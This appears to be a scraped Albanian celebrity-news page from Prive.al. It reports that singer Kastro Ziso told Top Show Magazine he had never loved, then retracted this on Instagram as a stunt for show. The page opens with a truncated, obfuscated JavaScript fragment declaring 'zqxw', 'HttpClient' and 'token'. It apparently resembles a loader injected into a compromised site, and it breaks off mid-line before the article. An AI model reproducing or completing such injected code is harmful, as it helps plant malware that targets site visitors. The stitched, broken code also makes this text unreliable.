;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Tha se s’ka dashuruar kurrë, Kastro Ziso tërheq deklaratën dhe kërkon nuse!

By

Këngëtari e kantautori shqiptar Kastro Ziso, habiti të gjithë opinionin publik gjatë një interviste në Top Show Magazine në Top Channel, kur tha se s’kishte dashuruar kurrë.

I martuar dy herë dhe baba i dy fëmijëve, Ziso madje shtoi se dashuria është për fukarenjtë dhe për injorantët.

Por në mëngjesin e së premtes, ai ka tërhequr të gjitha deklaratat duke shtuar se e kishte bërë për efekt televiziv, vetëm sa për “SHOU”.

Këtë e ka thënë në Instagram, ku shkruan se madje po kërkon edhe nuse.

“Miq dhe armiq nisur nga deklarata ime e fundit mbi mos dashurimin tim ne jete i kam nja 2 fjalë: Media është një gënjeshtër e madhe kështu që mos i besoni çdo gjë që thuhet. Shpesh herë gjërat bëhen për shoë apo për befasi momentale. Do thoni ju pse e bëre? Se ashtu mu tek se i kam mundësit për ta bërë. Kam dashuruar shumë në jetë dhe do vazhdoj ta bëj! Bëni dashuri dhe dashuroni!”, ka shkruar ai përmbi një foto ku shfaqet një maskë me hundë të madhe, duke simbolizuar mitin e Pinokios. /Prive.al

Artikuj të ngjashëm